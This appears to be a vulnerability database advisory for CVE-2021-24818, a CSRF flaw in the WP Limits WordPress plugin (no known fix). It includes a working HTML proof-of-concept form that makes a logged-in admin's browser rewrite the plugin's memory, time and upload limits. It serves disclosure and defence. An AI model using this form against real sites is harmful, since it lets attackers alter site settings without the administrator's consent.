WordPress Plugin Vulnerabilities

WP Limits <= 1.0 - Plugin's Settings Update via CSRF

Description

The plugin does not have CSRF check when saving its settings, allowing attacker to make a logged in admin change them, which could make the blog unstable by setting low values

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wp_define_limits" method="POST">
      <input type="hidden" name="process" value="wp_define_limits" />
      <input type="hidden" name="memory_limit" value="512" />
      <input type="hidden" name="process_time_limit" value="wp_define_limits" />
      <input type="hidden" name="time_limit" value="100" />
      <input type="hidden" name="process_upload_limit" value="wp_define_limits" />
      <input type="hidden" name="upload_limit" value="512" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
wp-limits
No known fix

References

CVE
CVE-2021-24818

Classification

Type
CSRF
OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-352
CVSS
5.4 (medium)

Miscellaneous

Original Researcher
Francesco Carlucci
Submitter
Francesco Carlucci
Submitter website
https://carluc.ci
Submitter twitter
francecarlucci
Verified
Yes
WPVDB ID
7cd524ed-5eb9-4d6b-b4d2-3d4be6b57879

Timeline

Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2021-07-05
Title
Woo MerchantX <= 1.0 - CSRF Bypass
Published
2021-09-28
Title
OG Tags < 2.0.2 - Plugin's Settings Update via CSRF
Published
2023-10-06
Title
CP Blocks < 1.0.21 - CSRF
Published
2023-02-28
Title
HT Portfolio < 1.1.6 - Arbitrary Plugin Activation via CSRF
Published
2023-02-28
Title
WP News <= 1.1.9 - Arbitrary Plugin Activation via CSRF